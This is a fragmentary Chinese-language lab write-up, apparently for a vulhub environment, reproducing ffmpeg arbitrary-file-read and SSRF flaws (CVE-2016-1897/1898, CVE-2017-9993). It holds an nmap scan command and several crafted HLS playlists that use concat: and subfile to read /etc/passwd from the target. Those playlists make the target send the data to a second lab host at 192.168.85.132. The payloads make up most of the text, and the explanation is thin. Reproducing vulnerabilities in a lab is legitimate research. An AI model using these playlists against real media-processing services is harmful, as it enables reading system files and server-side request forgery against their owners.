(CVE-2016-1897)(CVE-2017-9993)
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
信息收集:nmap 192.168.85.130 -p 8080 -A
由于vulhub并没有讲述该漏洞如何复现,我们需要进入环境查看源码
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://192.168.85.132:9999/?
#EXTM3U #EXT-X-MEDIA-SEQUENCE:6 #EXTINF:10.0, concat:http://192.168.85.132:8888/back.txt|file:///etc/passwd #EXT-X-ENDLIST
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://192.168.85.132:8888/back.txt|subfile,,start,0,end,31,,:///etc/passwd|subfile,,start,32,end,79,,:///etc/passwd|subfile,,start,80,end,116,,:///etc/passwd|subfile,,start,117,end,153,,:///etc/passwd|subfile,,start,154,end,188,,:///etc/passwd|subfile,,start,189,end,236,,:///etc/passwd|subfile,,start,237,end,284,,:///etc/passwd|subfile,,start,285,end,329,,:///etc/passwd|subfile,,start,330,end,373,,:///etc/passwd|subfile,,start,374,end,423,,:///etc/passwd|subfile,,start,424,end,475,,:///etc/passwd|subfile,,start,476,end,518,,:///etc/passwd|subfile,,start,519,end,571,,:///etc/passwd|subfile,,start,572,end,624,,:///etc/passwd|subfile,,start,625,end,686,,:///etc/passwd|subfile,,start,687,end,735,,:///etc/passwd|subfile,,start,736,end,817,,:///etc/passwd|subfile,,start,818,end,876,,:///etc/passwd|subfile,,start,877,end,918,,:///etc/passwd|subfile,,start,919,end,965,,:///etc/passwd #EXT-X-ENDLIST
ffmpeg 任意文件读取漏洞环境(CVE-2017-9993)
信息收集:nmap 192.168.85.130 -p 8080 -A
